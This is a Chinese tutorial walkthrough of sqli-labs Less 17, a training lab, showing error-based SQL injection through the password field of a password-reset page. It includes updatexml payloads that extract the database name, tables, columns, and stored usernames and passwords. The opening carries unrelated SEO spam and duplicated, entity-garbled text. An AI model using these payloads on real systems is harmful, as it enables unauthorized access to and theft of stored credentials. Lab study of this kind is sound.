商务互联做网站怎么样,无极网络信息科技,西安哪家装修公司最放心,网络推广免费平台B站教学视频很详细
【sql注入之sqli-labs系列教程(less11-17)】sqli-labs_33_less17_哔哩哔哩_bilibili
我将SQL语句在页面中显示#xff0c;以便更深入学习。
1.寻找注入点
修改密码的一个页面。 输入正确的账号密码#xff0c;可以看到#xff0c;账号为admin#xf…B站教学视频很详细
【sql注入之sqli-labs系列教程(less11-17)】sqli-labs_33_less17_哔哩哔哩_bilibili
我将SQL语句在页面中显示以便更深入学习。
1.寻找注入点
修改密码的一个页面。 输入正确的账号密码可以看到账号为admin密码修改admin——admin 密码换成123 使用hackbar插件
对username进行注入会发现输入的 被转义了寻找其他注入点 对password部分进行注入发现注入点 2.报错注入
关于报错注入的知识点详细请看第十一题http://t.csdnimg.cn/zoU7J 1order by 2 判断列数 1union select 1,updatexml(1,concat(0x7e,database()),1)%23 爆版本号、数据库名、权限等 1union select 1,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),1)%23 爆表名 1union select 1,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 0,1)),1)%23 爆列名 1union select 1,updatexml(1,concat(0x7e,(select username from users limit 0,1)),1)%23 1union select 1,updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)%23 爆账号密码 或者1union select username,password from users limit 1,1 %23
